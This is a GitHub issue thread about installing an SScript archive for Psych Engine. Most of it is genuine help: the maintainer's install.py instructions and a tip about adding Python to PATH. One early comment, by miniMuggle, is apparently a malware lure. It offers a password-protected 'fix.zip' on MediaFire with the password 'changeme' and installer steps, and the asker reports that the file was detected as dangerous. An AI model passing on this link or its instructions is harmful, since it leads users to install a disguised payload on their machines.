### ISSUE TITLE
I'm Confused

### ISSUE THREAD

**Issue by PedroNiccola** [CCobaltDev/SScript-Archive#4]
I want to install SSCript-Archive so that I can run Psych Engine with source code, but I don't understand what to do, can someone help me?

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PedroNiccola** [comment]
They detected it as a dangerous file

**Comment by PedroNiccola** [comment]
hello?

**Comment by CCobaltDev** [comment]
Download `install.py` from [here](https://github.com/CobaltBar/SScript-Archive/blob/main/install.py)
Open a terminal in a directory that contains the downloaded `install.py`
Run `python install.py VERSION` with `VERSION` being an sscript version (`7.7.0`, `17,0,618`, etc)

**Comment by nikcoliolol** [comment]
i also have the same problem
i ran that and it just says
![image](https://github.com/user-attachments/assets/9974f31f-61d2-46d5-9d2c-43fb314de6e6)
i even downloaded the latest version of python

**Comment by moxie-coder** [comment]
> i also have the same problem i ran that and it just says ![image](https://private-user-images.githubusercontent.com/123262252/363644717-9974f31f-61d2-46d5-9d2c-43fb314de6e6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUyOTU1NzQsIm5iZiI6MTcyNTI5NTI3NCwicGF0aCI6Ii8xMjMyNjIyNTIvMzYzNjQ0NzE3LTk5NzRmMzFmLTYxZDItNDZkNS05ZDJjLTQzZmIzMTRkZTZlNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwOTAyJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDkwMlQxNjQxMTRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00OTk1MGQ1YTVjNGY3ZWE5Y2UwODVjYzQ4YTNhZDhiYmNiYjUwOTU0ZTliYTFhN2VhMTdlNTE4NTZhZTg0NzgxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.Zik2CMpNFfn2jqUTRX0zOnFR9hmdye7-G6yTCt9u5oc) i even downloaded the latest version of python

you have to make sure you added it to path, and once you did you have to restart your pc for it to work
